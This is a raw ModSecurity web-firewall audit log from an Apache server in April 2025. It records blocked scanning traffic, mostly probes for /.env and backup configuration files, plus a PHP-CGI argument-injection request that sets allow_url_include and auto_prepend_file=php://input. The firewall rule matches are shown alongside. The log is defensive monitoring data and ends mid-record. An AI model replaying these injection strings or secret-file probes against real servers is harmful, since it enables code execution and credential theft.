[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (127+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744780137240224 4440 (- - -) Stopwatch2: 1744780137240224 4440; combined=3304, p1=349, p2=2760, p3=0, p4=0, p5=111, sr=82, sw=84, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2a2a856-Z-- --f947cc62-A-- [16/Apr/2025:14:34:15 +0700] Z_9dd5VnVduWmh0dMDMb1gAAAIY 103.236.140.4 51418 103.236.140.4 8181 --f947cc62-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 102.211.152.45 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 102.211.152.45 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --f947cc62-C-- --f947cc62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f947cc62-E-- --f947cc62-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744788855276394 4911 (- - -) Stopwatch2: 1744788855276394 4911; combined=3091, p1=518, p2=2539, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f947cc62-Z-- --7061af0c-A-- [16/Apr/2025:15:42:27 +0700] Z_9tc0-sESiKFppgz04h0wAAANQ 103.236.140.4 52022 103.236.140.4 8181 --7061af0c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.63.18 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.63.18 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --7061af0c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7061af0c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744792947282450 750 (- - -) Stopwatch2: 1744792947282450 750; combined=331, p1=290, p2=0, p3=0, p4=0, p5=41, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7061af0c-Z-- --ca8b976a-A-- [16/Apr/2025:16:49:22 +0700] Z_99Ihk9XPLR9cFiTEvK4QAAABg 103.236.140.4 52404 103.236.140.4 8181 --ca8b976a-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --ca8b976a-C-- èexamplecom --ca8b976a-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --ca8b976a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744796962765021 2816 (- - -) Stopwatch2: 1744796962765021 2816; combined=1955, p1=449, p2=1436, p3=21, p4=23, p5=25, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ca8b976a-Z-- --210c4625-A-- [16/Apr/2025:16:49:23 +0700] Z_99Ixk9XPLR9cFiTEvK4gAAAAM 103.236.140.4 52410 103.236.140.4 8181 --210c4625-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --210c4625-C-- £{examplecom --210c4625-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --210c4625-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744796963056845 2714 (- - -) Stopwatch2: 1744796963056845 2714; combined=1846, p1=396, p2=1380, p3=21, p4=23, p5=25, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --210c4625-Z-- --fa40566d-A-- [16/Apr/2025:16:49:23 +0700] Z_99Ixk9XPLR9cFiTEvK4wAAABQ 103.236.140.4 52416 103.236.140.4 8181 --fa40566d-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --fa40566d-C-- G examplecom --fa40566d-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa40566d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744796963347574 2687 (- - -) Stopwatch2: 1744796963347574 2687; combined=1835, p1=397, p2=1370, p3=20, p4=23, p5=25, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa40566d-Z-- --225f2625-A-- [16/Apr/2025:16:49:23 +0700] Z_99Ixk9XPLR9cFiTEvK5QAAAAI 103.236.140.4 52422 103.236.140.4 8181 --225f2625-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --225f2625-C-- ”Øexamplecom --225f2625-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --225f2625-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744796963638769 3297 (- - -) Stopwatch2: 1744796963638769 3297; combined=2204, p1=477, p2=1643, p3=27, p4=29, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --225f2625-Z-- --de8d6117-A-- [16/Apr/2025:16:49:23 +0700] Z_99I5VnVduWmh0dMDMcDwAAAIw 103.236.140.4 52428 103.236.140.4 8181 --de8d6117-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --de8d6117-C-- ‰?examplecom --de8d6117-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --de8d6117-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744796963956080 3139 (- - -) Stopwatch2: 1744796963956080 3139; combined=2114, p1=455, p2=1585, p3=20, p4=24, p5=30, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de8d6117-Z-- --07f62c7d-A-- [16/Apr/2025:16:49:24 +0700] Z_99JJVnVduWmh0dMDMcEAAAAI0 103.236.140.4 52434 103.236.140.4 8181 --07f62c7d-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --07f62c7d-C-- ñÍexamplecom --07f62c7d-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --07f62c7d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744796964254444 2773 (- - -) Stopwatch2: 1744796964254444 2773; combined=1857, p1=407, p2=1373, p3=20, p4=23, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07f62c7d-Z-- --4fd74d5e-A-- [16/Apr/2025:16:49:24 +0700] Z_99JJVnVduWmh0dMDMcEgAAAJE 103.236.140.4 52440 103.236.140.4 8181 --4fd74d5e-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --4fd74d5e-C-- £”examplecom --4fd74d5e-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --4fd74d5e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744796964945648 2917 (- - -) Stopwatch2: 1744796964945648 2917; combined=1829, p1=400, p2=1350, p3=28, p4=24, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4fd74d5e-Z-- --0ada093e-A-- [16/Apr/2025:16:49:25 +0700] Z_99JRk9XPLR9cFiTEvK6wAAAAs 103.236.140.4 52446 103.236.140.4 8181 --0ada093e-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.91.125.252 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.91.125.252 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --0ada093e-C-- °Wexamplecom --0ada093e-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --0ada093e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1744796965989753 2908 (- - -) Stopwatch2: 1744796965989753 2908; combined=1856, p1=392, p2=1376, p3=28, p4=34, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ada093e-Z-- --528daa5a-A-- [16/Apr/2025:17:12:39 +0700] Z_-Clxk9XPLR9cFiTEvLHwAAABU 103.236.140.4 52668 103.236.140.4 8181 --528daa5a-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 147.182.149.75 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 147.182.149.75 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --528daa5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --528daa5a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744798359852196 780 (- - -) Stopwatch2: 1744798359852196 780; combined=318, p1=285, p2=0, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --528daa5a-Z-- --60e1e224-A-- [16/Apr/2025:17:20:01 +0700] Z_-EUSpe92T0H9-Aa0zD4wAAAEg 103.236.140.4 52784 103.236.140.4 8181 --60e1e224-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 167.71.175.236 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 167.71.175.236 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --60e1e224-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60e1e224-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744798801979234 835 (- - -) Stopwatch2: 1744798801979234 835; combined=325, p1=292, p2=0, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --60e1e224-Z-- --bff99756-A-- [16/Apr/2025:18:33:35 +0700] Z_-Vjxk9XPLR9cFiTEvLUQAAABI 103.236.140.4 53264 103.236.140.4 8181 --bff99756-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 159.89.127.165 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 159.89.127.165 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --bff99756-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bff99756-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744803215623578 670 (- - -) Stopwatch2: 1744803215623578 670; combined=257, p1=220, p2=0, p3=0, p4=0, p5=37, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bff99756-Z-- --74069e37-A-- [16/Apr/2025:18:38:53 +0700] Z_-WzZVnVduWmh0dMDMcKAAAAIU 103.236.140.4 53308 103.236.140.4 8181 --74069e37-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1 --74069e37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74069e37-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744803533453999 786 (- - -) Stopwatch2: 1744803533453999 786; combined=327, p1=287, p2=0, p3=0, p4=0, p5=40, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74069e37-Z-- --9705b303-A-- [16/Apr/2025:18:38:54 +0700] Z_-WzpVnVduWmh0dMDMcKQAAAIc 103.236.140.4 53310 103.236.140.4 8181 --9705b303-B-- GET /conf/config.ini HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36 OPR/15.0.1147.100 --9705b303-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9705b303-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744803534512979 2212 (- - -) Stopwatch2: 1744803534512979 2212; combined=820, p1=376, p2=417, p3=0, p4=0, p5=26, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9705b303-Z-- --9bbabf05-A-- [16/Apr/2025:18:39:04 +0700] Z_-W2Bk9XPLR9cFiTEvLWgAAAAg 103.236.140.4 53322 103.236.140.4 8181 --9bbabf05-B-- GET /configure.php.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; HTC_0PCV220/1.11.506.1 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 --9bbabf05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bbabf05-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744803544023196 1762 (- - -) Stopwatch2: 1744803544023196 1762; combined=766, p1=354, p2=386, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bbabf05-Z-- --a271fc58-A-- [16/Apr/2025:18:39:12 +0700] Z_-W4Bk9XPLR9cFiTEvLXAAAAAc 103.236.140.4 53326 103.236.140.4 8181 --a271fc58-B-- GET /config.ini.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.12) Gecko/2009070818 Ubuntu/8.10 (intrepid) Firefox/3.0.12 --a271fc58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a271fc58-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".ini.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1744803552126946 1973 (- - -) Stopwatch2: 1744803552126946 1973; combined=827, p1=384, p2=414, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a271fc58-Z-- --ec251a2c-A-- [16/Apr/2025:18:39:15 +0700] Z_-W4xk9XPLR9cFiTEvLXgAAAAs 103.236.140.4 53330 103.236.140.4 8181 --ec251a2c-B-- GET /crm/.env.production HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.151 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.151 X-Forwarded-Proto: https Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16 --ec251a2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec251a2c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1744803555349470 617 (- - -) Stopwatch2: 1744803555349470 617; combined=252, p1=218, p2=0, p3=0, p4=0, p5=33, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec251a2c-Z-- --324de545-A-- [16/Apr/2025:19:52:10 +0700] Z_-n-pVnVduWmh0dMDMoeQAAAJA 103.236.140.4 51388 103.236.140.4 8181 --324de545-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 206.81.12.187 